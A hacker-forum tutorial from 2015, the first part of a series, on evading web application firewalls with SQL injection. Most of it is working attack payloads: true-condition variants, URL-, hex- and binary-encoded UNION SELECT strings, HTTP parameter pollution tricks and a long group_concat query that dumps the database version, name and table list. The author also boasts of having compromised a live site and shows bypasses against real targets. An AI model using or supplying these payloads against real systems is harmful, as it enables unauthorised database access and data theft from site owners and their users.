In the Name of ALLAH the Most Beneficent and the Merciful

Understanding the concept is more important than learning some tricks which i guess are posted in every second WAF bypass tutorial, so in this tutorial i will try to talk more about the internal concept than just bypassing shit. Once you know the concept you can easily manipulate things and develop your own bypass methods in a much more clever way, than just being dependent on all those shitty tricks. One more thing as am not more of a theory guy, so will discuss point to point.

Here is the complete TOC for My WAF tutorial Series, as its normal i cant discuss all in one tutorial. I have separated whole TOC in 7 parts.

Part - 1
What is Firewall
Common Type of Firewalls
[*] Network Layer Firewall
[*] Web Application Firewall
Detecting the WAF
Types of Approaches used and thier bypasses
[*] Different Types of Encoding
[*] Double Encoding to bypass WAF
[*] Bypassing Case sensitive Filters
[*] HTTP Parameter Pollution
Part - 2
[*] White spaces Bypass
[*] Bypass for Columns seprators filters
[*] Comma Replace/Filter Bypass
[*] Comments and Inline Commenting
[*] Bypassing with Special Characters
Part - 3
[*] Bypassing Keyword Replace WAF
[*] Buffer Overflow Methods
[*] Changing the comment type
[*] Bypass using Null Byte Poisoning
[*] Change Request Method
Part - 4
[*] Path Evasion Bypass Methods
[*] Parameter Evasion Bypass Methods
[*] Mount Origin Server to Bypass WAF
[*] Bypass Proxified Applications using SSRF
[*] The ultimate bypass method by K.K (it actually works)
[*] Using Chunked Requests to bypass WAF
Part - 5
[*] Bypassing Cookies based WAF
[*] Bypassing Session based WAF
[*] Host Header Manipulation
[*] Header Injection to Bypass WAF
[*] SQL Injection Smuggling Attack
[*] Routed Query Injection WAF Bypass
[*] Multi Query Injection WAF Bypass
Part - 6
Understanding WAF behaviour and Bypass Accordingly
Some Example WAFs and Practical bypass
Part - 7
WAF Bypass Payloads for Fuzzing

What is Firewall

Firewall is a security system which controls the traffic between a Network, Server or an Application. There are both Software and Hardware firewalls.

Common Type of Firewalls

[*] Network Layer Firewall
[*] Web Application Firewall

Network Layer Firewall

Network layer firewalls, operates at a relatively low level of the TCP/IP protocol stack, not allowing packets to pass through the firewall unless they match the established rule set which could be White Listing or the Black Listing. The firewall administrator may define the rules; or default rules may be applied. This type of firewalls usually drops the packet when it does not pass the ruleset. Many times while Injecting an application when your packet gets completly dropped and shows that there was no reply from server, you can assume thats its a Network Firewall. Although the behaviour can not be very specific, it usually depends on the settings.

Here we can have an example behaviour of such Firewall.
Normal URL
Packet Dropped - No reply - Detected By Firewall union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Bypassed: union select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Web Application Firewall

WAFs are typically deployed in some sort of proxy fashion just in front of the web applications, so they do not see all traffic on our networks. By monitoring the traffic before it reaches the web application, WAFs can analyze requests before passing them on. This is what gives them such an advantage over IPSs. Because IPSs are designed to interrogate all network traffic, they cannot analyze the application layer as thoroughly as WAF.

Here is an example MOD security WAF
Normal URL
Detected By MOD Security' UNION SELECT 1,2,3-- -
Bypassed:'/*!50000UNION*//*!50000SELECT*/1,2,3,4,5,6,7-- -
Now before i continue i would like to share a very interesting fact about this site, i remember its vulnerable since a long time. Last time we injected it and owned it. This time when i started injecting i found something is changed. I thought its no more vulnerable. But then i came to know its still vulnerable the only change made i they are no using two firewalls. Its like the admin do not want to waste time in changing the application code and remove the vulnerability, he only fucking want to increase the count of firewalls to increase security. Damn You!! why dont you fucking remove the vulnerability rather than using more WAF.

Remember WAF is a good security, but you can not just leave the application vulnerable and completely rely on WAF for security. Now lets move to our next topic detecting the WAF

Detecting the WAF

There are many tools and scripts which can detect and fingerprint WAF presence over an Application, which includes but not limited to
Checking the response headers
Checking Response Body

Here we will discuss basic syntax of NMAP and WAFw00f but for the rest i will suggest you reading Rafay Baloch Research Papers on WAF, its already nicely discussed and explained over there, so i suppose there is no meaning to write the same things over here and making this tutorial lengthy.

Detecting WAF using NMAP
nmap -p80 --script http-waf-detect <host>
Fingerprinting WAF using NMAP
nmap -p80 --script http-waf-fingerprint <host>
Fingerprinting WAF using WAFw00f <url>
Once you know the WAF you are dealing with, you can search for its available Bypass.

Now moving on to the most favorite methods of all Inj3ct0rs which is Bypassing the WAF manually.

Types of Approaches used and thier bypasses

We will learn multiple ways of WAF bypass and once we are finished, we ll couple them up and mix them together for complex WAF bypasses methods.

1. Different Types of Encoding

There are many types of encoding, some of them are supported by the Application Server, Some of them are supported by the Web App and some of them are supported by the Database Server. When we send a request it goes through many Layers and Different types of Application before our input reach the database, which is why many times we are able to use different types of encodings and double encoding which are not supported by database server but the other applications in between, which may decode our input and pass it to the database server. Sometimes taking advantage of such behaviour helps us to bypass WAF.

Lets take a basic example there is a nice filewall implemented on an application. The application have a get parameter input which is first encoded into Base64 and then Rot13, now heres the funny part. When we inject such application our Input goes encoded and Bypass WAF, next when it come to the application its decoded and then sent to databse server. Here we bypassed WAF because our input was encoded and the application decoded it before it was passed to database.

In this manner there are many different types of encodings which we can use to bypass WAF for example URL Encoding, Hexing, Binary, Unicode etc. First of all we will start with bypassing the test condition rules which many WAFs are blocking these days like:
Blocked True Conditions
1 or 1=1
1' or ''='
1" or ""="
1' or true#
1" or true#
1 or true#
Now Lets Mix Up some common sense and encodings to bypass such filters:
or '1
|| '1
null' || 'a'=_binary'a
1' || 'a'=x'61
1' && '0'=x'30
1' %26%26 %270%27%3dx'30
2' && 0.e1=_binary"0
1 or 1.e1=0b1010
' || 1 like 1
' || 2 not like 1
110 or x'30'=48
1 or 20!='1'
2 and 2>0
3 || 0<1
12 || 0b1010<0b1011
0b11 || 0b1010x'30'
1 or 0b1
111' or _binary'1
1 or 2121
1' or 12 rlike '1
Using the above Bypasses and by mixing them up you can generate thousands of different payload and bypasses. Here i have used Binary, Hex encoding as well as some keywords to bypass. Actually WAFs detect anything malicious using the ruleset defined with them. So we need to generate something different to confuse them.

If you did not understood above methods here is a basic explanation of using Binary, Hex, Like and Rlike in SQL
Select 1 from dual where 0b1010=10
Hex Type 1
Select 1 from dual where '0'=x'30'
Hex Type 2
Select 1 from dual where 0x30='0'
Like statement
Select 1 from dual where 1 like 1 
Rlike Statement
Select 1 from dual where 12 rlike 1
|| (OR)
Select 1 from dual where 1||1
&& (And)
Select 1 from dual where 1&&1
Here we can see some working examples:
Blocked: or 1 or 1=1 or 0>2
Bypassed or ''='' || 0b1=x'31' ||'1'!=20 || 1=1 || 1 like 1 || 12 rlike 1
As we know SQL do not support URL encoding but Webserver and Apllication do. So we can also use URL encoding to bypass WAF. The first thing is to understand how is works. Some times when a Network Based Firewall is implemented or even in case of a Application firewall this could happen that the WAF is not docoding our input while comparing with the rule set. When our input reach to the server or the application then it is decoded, and then it is passed to the database server. In this manner URL encoding also helps us Bypassing waf many times.

Following are some examples of URL encoded WAF bypass Payload:
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%55nion %53eLEct
u%6eion se%6cect
unio%6e %73elect
uni%6fn distinct%52OW s%65lect
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%74
Example (Blocked) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23
URL Encoded Bypass unio%6e selec%74 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23
Example (Blocked) 1,2,3,4,5,6,7,8,9,10,11,12)
URL Encoded Bypass
Now you know the concept and the example already, so i guess it wont be a problem for you to make some more payloads for you and not only that but using URL encoding in the right way when required. You are not bound to use URL encoding only with union select but you can also encode other keywords and operators.

Lets see some other uses of encodings, here we assume a WAF have blocked/filtered use of '0x' to filter use of hex in your Injection and single or double quotes are not allowed. Even sometimes WAFs use to decode Hexed Input and check for malicious content. We can try the following ways to overcome the situation.
Normal Hex (Blocked)
select 0x313131
Hexed Bypass Version
select x'313131';
Binary Bypass
select 0b011110100110010101101110;
Bypass using functions
select unhex(x'333133313331');
For example here is an application having WAF + Routed Query Injection. The problem is that when we route the injection to another query our Hexed Input is getting detected by WAF. As you can see here.

Bypassed Link'UnION distinctrow Select 11-- -
Routed Query under Hexed Payload Blocked'UnION distinctrow Select 0x2e312929556e494f6e2053656c65637420312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c313723-- --
Now lets try the above bypasses we discussed, on this one.

First we can rebypass it under Hex payload.'UnION distinctrow Select 0x2e312929556e494f6e2064697374696e63742053656c65637420312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c313723-- -
Second we can use Hex in such a way firewall never expected'UnION distinctrow Select x'2e312929556e494f6e2053656c65637420312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c313723'-- -
In a condition single Quotes are blocked we can use this bypass'UnION distinctrow Select 0b0010111000110001001010010010100101010101011011100100100101001111011011100010000001010011011001010110110001100101011000110111010000100000001100010010110000110010001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101100001100010011001100101100001100010011010000101100001100010011010100101100001100010011011000101100001100010011011100100011-- -
One more way to bypass it'UnION distinctrow Select unhex('2e312929556e494f6e2053656c65637420312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c313723')-- -
Lets say we have decided to use Hex here is another bypass'UnION distinctrow Select replace(0x2e312929556e495f7a656e4f6e2053656c5f7a656e65637420312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c313723,(0x5f7a656e),'')-- -
One more way to bypass even if Quotes are not available'UnION distinctrow Select unhex(0x32653331323932393535366534393466366532303533363536633635363337343230333132633332326333333263333432633335326333363263333732633338326333393263333133303263333133313263333133323263333133333263333133343263333133353263333133363263333133373233)-- -
And so we can keep going to bypass the above WAF in many other ways. Now thats all on the basic encoding and thier role while bypassing WAF, here is an application you can use to encode/decode your payload Hash Analyzing Workstation. There are few times you can also use UTF-8 URL encoding to bypass WAF so that too i have included in the Workstation.

NOTE : This LAB is not developed by me from scratch, i got its code from a friend. What i did is adjusted some code, added some encodings and made it a little better to work with.

Double Encoding to bypass WAF

As we discussed before there are many applications playing role to pass your input from your browser to the database. This trick is based on exploiting this behaviour when our input gets decoded two times before it reach the database. As we know that web server do the basic URL decoding as it pass the Input parameters to the Web Application. But what if the developer again did the decoding? well yeah there are many times developer URL decode the input before using. Here arises one Loophole :D. We can sometimes use this behaviour to Bypass Firewall.

Example WAF (Blocked) union select 1111,1222,1333&premflag=&searchcat=buy
Bypassed With Double URL Encoding,1222,1333&premflag=&searchcat=buy

Bypassing Case sensitive Filters

As we discussed earlier about the ruleset defined by WAF, if you know some basics of REGEX then there is no need to tell you the different between:
A Grand salute to all those admins who really take too much care of hackers by leaving such bypasses.

Well if you dont know, then let me tell you. The first one is case sensitve and the second one is case insensitive, while making regex rules this mistake could happen sometimes. Which gives birth to such sites.

Group_concat Blocked' and false /*!50000UNION*/ALL+SELECT*from(select /*!50000group_concat(shit SEPARATOR '')*/from(select 0x223e3c2f613e3c2f6469763e3c2f6469763e3c2f74683e3c2f74723e3c2f7461626c653e3c666f6e7420636f6c6f723d22726564223e3c62723e3c623e496e6a6563746564206279205a454e3c2f623e3c62723e56657273696f6e203a3a20 as shit /*!50000union*/select version()/*!50000union*/select 0x3c62723e4461746162617365203a3a20/*!50000union*/select database()/*!50000union*/select 0x3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d22677265656e223e3c753e3a3a205461626c657320466f756e64203a3a203c2f753e3c6c693e/*!50000union*/select/*!50000group_concat(table_name SEPARATOR 0x3c6c693e)*/from/*!50000InFormation_schema.tables*//*!50000where+*/table_schema=/*!50000database()*/)lol)a1 join(select(0x3133333732))a2 join(select(0x3133333733))a3 join(select(0x3133333734))a4 join(select(0x3133333735))a5 join(select(0x3133333736))a6--+
Changing Case of Group_Concat to bypass' and false /*!50000UNION*/ALL+SELECT*from(select /*!50000GrOup_CoNcat(shit SEPARATOR '')*/from(select 0x223e3c2f613e3c2f6469763e3c2f6469763e3c2f74683e3c2f74723e3c2f7461626c653e3c666f6e7420636f6c6f723d22726564223e3c62723e3c623e496e6a6563746564206279205a454e3c2f623e3c62723e56657273696f6e203a3a20 as shit /*!50000union*/select version()/*!50000union*/select 0x3c62723e4461746162617365203a3a20/*!50000union*/select database()/*!50000union*/select 0x3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d22677265656e223e3c753e3a3a205461626c657320466f756e64203a3a203c2f753e3c6c693e/*!50000union*/select/*!50000group_coNcAt(table_name SEPARATOR 0x3c6c693e)*/from/*!50000InFormation_schema.tables*//*!50000where+*/table_schema=/*!50000database()*/)lol)a1 join(select(0x3133333732))a2 join(select(0x3133333733))a3 join(select(0x3133333734))a4 join(select(0x3133333735))a5 join(select(0x3133333736))a6--+
If you see in the above URL there are two firewalls, one is "406 Not Acceptable", second is "403 Forbidden" one. The first one i bypassed using Inline commenting which we will discuss later, second one which was blocking concat bypassed by changing the case.

HTTP Parameter Pollution

May be many of you have heard of it but am sure few would have ever used it. First of all what is HPP, Definition at OWASP - Supplying multiple HTTP parameters with the same name may cause an application to interpret values in unanticipated ways. By exploiting these effects, an attacker may be able to bypass input validation, trigger application errors or modify internal variables values. As HTTP Parameter Pollution (in short HPP) affects a building block of all web technologies, server and client side attacks exist.

Here is a table which shows the default behavior of these application with HPP.

Now as you have seen in the above image that ASP.NET add all the instances of the variables passed in the URL to comma separated values. We ll use it now for some basic bypass methods.
Example WAF (Blocked)'union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,'web.config',20,21--
There are loads of ways to bypass the above WAF but we are gonna use tricks using HPP'union--+&uid=*/%0aselect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,'web.config',20,21--
Lets try some other ways we can use HPP for Comma Filtered WAF'union--+&uid=*/%0aselect 1&uid=2&uid=3&uid=4&uid=5&uid=6&uid=7&uid=8&uid=9&uid=10&uid=11&uid=12&uid=13&uid=14&uid=15&uid=16&uid=17&uid=18&uid='web.config'&uid=20&uid=21--
As HPP will implode all the values to CSV format, that will help our query to work just fine. In such manner there is alot you can do with HPP.

As i cant discuss all the topics in one tutorial so we will stop here for this part. Will start with the other topics on WAF in the next part, till then have fun...keep learning :)

Author : Zen Javanicus
Date : 2015-03-28